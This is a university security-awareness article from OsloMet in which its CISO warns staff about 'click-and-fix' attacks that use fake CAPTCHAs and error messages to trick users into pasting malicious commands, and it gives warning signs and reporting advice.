Security Month: Warning about a new type of cyberattack

A new and cunning method aims to make you activate malware yourself.

"We can call it the "click-and-fix attack," a method where you are tricked into executing commands on your own computer. The perpetrators of the cyberattack make you "fix" something via clicking and pasting", explains Gustav Birkeland, Chief Information Security Officer (CISO) at OsloMet.

Robot verifications and error messages

According to Microsoft, such attacks are being observed more and more frequently. The attacks are often disguised as, for example, "I am not a robot" verifications (CAPTCHAs) or fake error messages that appear authentic.

"This makes it challenging even for modern security tools to block the attack because it is your clicks and actions that activate the malicious code. We have observed such attacks in which OsloMet users were deceived. So far, these have been stopped by security measures implemented by the IT Department", says Birkeland.

Here are some examples of what organizations can be exposed to:

Theft of passwords and login credentials.
Computers being used to spread cyberattacks within the organization's systems and to partners.
Attackers sending emails to entire contact lists from employees' accounts.
Files and data being deleted, locked, or misused for, e.g., identity theft.
Organizations losing access to critical systems.

What should you be particularly cautious about?

Messages or websites claiming you need to "fix something now" with a single click or verification.
PC support or "fix problems" videos on YouTube and TikTok, for example, claiming to help with a slow computer or removing viruses. These may include copy-and-paste commands that install malware.
Requests to copy commands and paste them elsewhere, such as in "Run" (Windows key + R), a quick function in Windows to start programs, folders, or system tools by typing their names in a small text field.
"I am not a robot" pop-ups (CAPTCHA) or verifications that lead you to additional steps. Attackers exploit the fact that we are used to clicking through such checks and add extra steps that damage your computer, your data, and OsloMet.
Web addresses that look suspicious, such as strange website names with only numbers and symbols.
Pop-up windows attempting to scare or pressure you into acting immediately. Such warnings can also come in the form of emails or SMS messages, attempting to force you to act quickly.

What should you do if you're unsure?

Stop and think. Don't let yourself be pressured into clicking.
Check the sender and web address. Are they trustworthy?
Do not paste commands or perform what they are asking you to do.
Take a screenshot and report it to sikkerhet@oslomet.no.
Don't be fooled by verification pages. Genuine system alerts usually don't require you to execute commands yourself.